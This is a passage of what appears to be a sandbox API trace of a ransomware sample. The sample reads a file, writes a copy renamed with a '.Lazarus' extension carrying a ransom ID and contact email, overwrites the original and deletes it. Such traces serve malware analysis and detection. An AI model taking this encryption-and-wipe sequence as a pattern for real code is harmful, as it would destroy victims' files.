ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x1, dwReserved1=0x0, cFileName="Rotate6.ico", cAlternateFileName="")) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.176] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.176] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0075.177] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.177] AreFileApisANSI () returned 1 [0075.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico", lpUsedDefaultChar=0x0) returned 43 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0075.177] AreFileApisANSI () returned 1 [0075.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.177] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.178] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.178] GetFileType (hFile=0x410) returned 0x1 [0075.178] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.178] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0075.178] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0075.178] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0075.178] CloseHandle (hObject=0x410) returned 1 [0075.179] AreFileApisANSI () returned 1 [0075.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67a20 [0075.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67a20, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.179] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.179] GetFileType (hFile=0x410) returned 0x1 [0075.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67a20 | out: hHeap=0x20000) returned 1 [0075.179] CloseHandle (hObject=0x410) returned 1 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0075.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0075.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.179] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.179] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.180] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0075.180] AreFileApisANSI () returned 1 [0075.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.180] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67660 [0075.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e228, cbMultiByte=-1, lpWideCharStr=0x67660, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.180] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67660 | out: hHeap=0x20000) returned 1 [0075.181] AreFileApisANSI () returned 1 [0075.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0075.181] GetLastError () returned 0x0 [0075.181] SetLastError (dwErrCode=0x0) [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e030 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0075.181] GetLastError () returned 0x0 [0075.181] SetLastError (dwErrCode=0x0) [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x69490 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76278 [0075.181] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69490 | out: hHeap=0x20000) returned 1 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0075.181] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0075.182] AreFileApisANSI () returned 1 [0075.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0075.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x5a6b8 [0075.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76278, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=105 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 105 [0075.182] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0075.182] GetFileType (hFile=0x410) returned 0x1 [0075.182] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0075.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0075.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0075.182] AreFileApisANSI () returned 1 [0075.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.182] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.182] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.183] GetFileType (hFile=0x42c) returned 0x1 [0075.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.183] GetLastError () returned 0x0 [0075.183] SetLastError (dwErrCode=0x0) [0075.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.183] GetLastError () returned 0x0 [0075.183] SetLastError (dwErrCode=0x0) [0075.183] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0075.183] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.183] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x37e, lpOverlapped=0x0) returned 1 [0075.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0075.539] ReadFile (in: hFile=0x42c, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0075.539] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d690 [0075.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0075.540] GetLastError () returned 0x0 [0075.540] SetLastError (dwErrCode=0x0) [0075.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe) returned 0x7d720 [0075.540] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d4e0 [0075.540] GetLastError () returned 0x0 [0075.540] SetLastError (dwErrCode=0x0) [0075.540] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0075.540] WriteFile (in: hFile=0x410, lpBuffer=0x91458*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x327ef70*=0x380, lpOverlapped=0x0) returned 1 [0075.541] GetLastError () returned 0x0 [0075.541] SetLastError (dwErrCode=0x0) [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d720 | out: hHeap=0x20000) returned 1 [0075.541] GetLastError () returned 0x0 [0075.541] SetLastError (dwErrCode=0x0) [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d4e0 | out: hHeap=0x20000) returned 1 [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0075.541] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0075.541] CloseHandle (hObject=0x410) returned 1 [0075.543] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.543] CloseHandle (hObject=0x42c) returned 1 [0075.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0075.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0075.543] AreFileApisANSI () returned 1 [0075.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.543] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0075.543] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.543] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0075.544] GetFileType (hFile=0x42c) returned 0x1 [0075.544] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0075.545] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0075.545] GetLastError () returned 0xb7 [0075.545] SetLastError (dwErrCode=0xb7) [0075.545] WriteFile (in: hFile=0x42c, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0075.546] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0075.546] CloseHandle (hObject=0x42c) returned 1 [0075.546] AreFileApisANSI () returned 1 [0075.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0075.546] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x66f40 [0075.546] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x66f40, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 43 [0075.546] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico")) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x66f40 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0075.547] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0075.548] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, 